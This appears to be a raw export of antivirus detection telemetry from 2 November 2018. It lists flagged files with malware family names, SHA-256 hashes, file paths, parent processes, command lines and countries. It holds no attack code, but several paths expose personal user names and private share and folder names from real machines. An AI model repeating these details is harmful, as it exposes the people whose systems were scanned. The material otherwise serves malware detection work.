  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T05:51:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:58:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T01:48:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-u -p 2312 -s 3420', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\WerFault.exe', parentsize=360448, timestamp='2018-11-02T04:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='\\\\\\/h \\\\\\/shared Global\\\\\\\\1f69fced099141d6983213ac44cf4800', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\WerFault.exe', parentsize=360448, timestamp='2018-11-02T09:50:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T03:48:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-024907-841d13df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-024907-841D13DF', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='92c58c566fe837c7534fda77d61910d6f60faa502ba4106db032949794686293', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:51:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='92c58c566fe837c7534fda77d61910d6f60faa502ba4106db032949794686293', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-6\\92C58C566FE837C7534FDA77D61910D6F60FAA502BA4106DB032949794686293', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='92c58c566fe837c7534fda77d61910d6f60faa502ba4106db032949794686293', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:21:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='92c58c566fe837c7534fda77d61910d6f60faa502ba4106db032949794686293', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-6\\92C58C566FE837C7534FDA77D61910D6F60FAA502BA4106DB032949794686293', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='92c58c566fe837c7534fda77d61910d6f60faa502ba4106db032949794686293', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:30:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adberdr707_es_es.exe', filepath='\\\\anomianas\\share\\materiale studio\\trashbox\\forniture\\METALCO\\metalco_cataloghi\\escofet (e)\\AdbeRdr707_es_ES.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='92c5a8c64f484d6f0a5c46717053153e82fbef2ae324e33474f22c7704fb7a26', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:CXsIGuRX906lzRI6.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T10:23:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adberdr707_es_es.exe', filepath='\\\\anomianas\\share\\materiale studio\\trashbox\\forniture\\METALCO\\metalco_cataloghi\\escofet (e)\\adberdr707_es_es.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='92c5a8c64f484d6f0a5c46717053153e82fbef2ae324e33474f22c7704fb7a26', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:CXsIGuRX906lzRI6.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T10:23:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adberdr707_es_es.exe', filepath='\\\\anomianas\\share\\materiale studio\\trashbox\\forniture\\METALCO\\metalco_cataloghi\\escofet (e)\\adberdr707_es_es.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='92c5a8c64f484d6f0a5c46717053153e82fbef2ae324e33474f22c7704fb7a26', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:CXsIGuRX906lzRI6.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T10:23:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adberdr707_es_es.exe', filepath='\\\\anomianas\\share\\materiale studio\\trashbox\\forniture\\METALCO\\metalco_cataloghi\\escofet (e)\\adberdr707_es_es.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='92c5a8c64f484d6f0a5c46717053153e82fbef2ae324e33474f22c7704fb7a26', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:CXsIGuRX906lzRI6.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T10:23:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\1.12\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='92c72f90f3a7ec74e1028e727d081282eaf3506929f2b1469d0f6dc36aa5a2ea', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe', parentsize=2552312, timestamp='2018-11-02T21:34:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2015年各类先进统计表l.xls', filepath='D:\\共享文件\\历史\\我的ww - 副本\\2014\\2014年各类先进申报表\\2014先进统计\\2015年各类先进统计表l.xls', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='933cdc4a2bf53541639eed7628eeb1d71557361c02e4fb4269dd7049cd4ec6fe', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T02:25:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2015年各类先进统计表l.xls', filepath='D:\\共享文件\\历史\\我的ww - 副本\\2014\\2014年各类先进申报表\\2014先进统计\\2015年各类先进统计表l.xls', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='933cdc4a2bf53541639eed7628eeb1d71557361c02e4fb4269dd7049cd4ec6fe', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T01:23:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~sed506.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~seD506.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='93ac4746ab48c9e627889c865f929c2318498b1ed11f3157b3d435c21e0511b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:04:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ccminer.exe', filepath='D:\\New folder (2)\\New folder\\RainbowMiner\\Bin\\NVIDIA-x16s\\ccminer.exe', filesize=45824000, name='HEUR/AGEN.1010782.#M1.#R1'), hash='940eb4c246019216c8f95ffb2f2e65fa147b13a65756a38d660146672e47844b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3894968, timestamp='2018-11-02T07:03:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\Desktop\\craftlandia\\CraftLandia Minecraft\\data\\CraftLandia 1.7.2\\data\\.minecraft\\versions\\1.7.2\\1.7.2-natives-14191621041986\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='941f88b2709bbdb5011d4d21dd1e6a789338927ec53bfb91b38c64a83921d5bd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T21:20:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eetsqpnmt0.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\eeTsQpNmt0.exe', filesize=71984000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='94521c06bf99686d8902a798f7a102f120c49bd800b94d8b209a569ef7f4d690', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:08:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-065936-a00eb1a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-065936-A00EB1A3', filesize=176000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='94b00e30c8968aabd833cc71544a955f1d5cbfc2d1a4fdcdc38e06fbd3d94fa5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:01:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ainslie 2.exe', filepath='/Users/ottohalter/Library/Containers/com.apple.mail/Data/Library/Mail Downloads/A36B9ABB-4978-4CF2-ADF0-A8F5FDC2E58A/ainslie 2.exe', filesize=576000, name='TR/Nivdort.Gen2.#M2.#R101522'), hash='951a29e32dbaf19adec39b5f6aaf100d69651698fab4a1e21118fec2adf3393e', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:49:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ainslie.exe', filepath='/Users/ottohalter/Library/Containers/com.apple.mail/Data/Library/Mail Downloads/A36B9ABB-4978-4CF2-ADF0-A8F5FDC2E58A/ainslie.exe', filesize=576000, name='TR/Nivdort.Gen2.#M2.#R101522'), hash='951a29e32dbaf19adec39b5f6aaf100d69651698fab4a1e21118fec2adf3393e', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:49:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='em000_32.dll', filepath='D:\\Archivos de programa\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='em000_32.dll', filepath='D:\\Archivos de programa\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:15:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='em000_32.dll', filepath='C:\\Program Files\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:08:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211430-e2f837ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211430-E2F837AD', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:14:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202313-efa89dff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40bae418\\AVSCAN-20181102-200324-7357C59E\\AVSCAN-20181102-202313-EFA89DFF', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T12:17:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211203-ce7dbfbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211203-CE7DBFBF', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:12:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211240-d3af2f9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211240-D3AF2F9B', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:12:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211053-c4b531c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211053-C4B531C3', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:10:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211023-c0864b3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211023-C0864B3E', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:10:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-220722-7cd92029', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40bae418\\AVSCAN-20181102-200324-7357C59E\\AVSCAN-20181102-220722-7CD92029', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T14:01:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-165644-58eaf2ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8e64cb28\\AVSCAN-20181102-162959-7940ACA9\\AVSCAN-20181102-165644-58EAF2CA', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:56:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-201416-b7811cf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40bae418\\AVSCAN-20181102-200324-7357C59E\\AVSCAN-20181102-201416-B7811CF7', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T12:08:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202831-10d23aff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40bae418\\AVSCAN-20181102-200324-7357C59E\\AVSCAN-20181102-202831-10D23AFF', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T12:22:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='958964170392e196874dd614bfbed8d47b1120a5dd494de5f86b4f84ac4d7725', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\958964170392E196874DD614BFBED8D47B1120A5DD494DE5F86B4F84AC4D7725', filesize=832000, name='HEUR/AGEN.1003642.#M1.#R1'), hash='958964170392e196874dd614bfbed8d47b1120a5dd494de5f86b4f84ac4d7725', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:28:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='95c45fa1ebfc6fb9ae18571480e6952e9adcba0a53bd164d8c3cfc1aca6d460c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-35.categorizing\\95C45FA1EBFC6FB9AE18571480E6952E9ADCBA0A53BD164D8C3CFC1ACA6D460C', filesize=448000, name='W32/Ramnit.C.#M1.#R1'), hash='95c45fa1ebfc6fb9ae18571480e6952e9adcba0a53bd164d8c3cfc1aca6d460c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T12:59:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Users\\olli\\AppData\\Local\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9600a7a82fa27381b6c5a23c81326e60b1b30a39d0b20feb6a066b67ef1ea05e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:27:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='962c810f33f5428faa0e34324f51f035ddda06413c0b30b4a236bf1a3a56ffc6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9636803b93bc0c119a050695a35c0d1f20c9ee76efb8d01b3d5f73c40b702ba1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T17:18:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-040538-d35742ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-040538-D35742CE', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='9653554c59f3a7a927926b6f783cde4e7f90afe22e988ab926b446d89384ce84', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\OUTLANDER MY17\\TOOL\\VISTAMSV\\ENV\\VISTAMSVE\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='96b37cba1c648602266521f9fed2c4433a2dcb3851e525781a107bf4ad5616d6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\K:\\برامج\\Fack Folder تشفير\\Setup.EXE', filesize=64000, name='HEUR/Patched.Ren.#M1.#R1'), hash='96df2d3e042ce9df1df860a597477c9d5c4bc91878179a5d53caf2674bed2509', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:15:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverquery.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\driverquery.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='96f25ee77a87eda83cc41b471e698901aaa78954056ec35403055298a3d60d49', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:10:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverquery.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\driverquery.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='96f25ee77a87eda83cc41b471e698901aaa78954056ec35403055298a3d60d49', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverquery.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\driverquery.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='96f25ee77a87eda83cc41b471e698901aaa78954056ec35403055298a3d60d49', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='meterpreter-32_c17a8b79.exe', filepath='C:\\metasploit-framework\\meterpreter-32_c17a8b79.exe', filesize=256000, name='TR/Crypt.XPACK.Gen.#M300.#R510'), hash='9792e43437f8d5f0f64f2164d17a1eb3481b776e36d0c4275fada175c9ae7803', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T10:51:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='meterpreter-32.exe', filepath='C:\\metasploit-framework\\meterpreter-32.exe', filesize=256000, name='TR/Crypt.XPACK.Gen.#M300.#R510'), hash='9792e43437f8d5f0f64f2164d17a1eb3481b776e36d0c4275fada175c9ae7803', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T10:16:04Z'), dt=datetime.date(2018, 11, 2)),
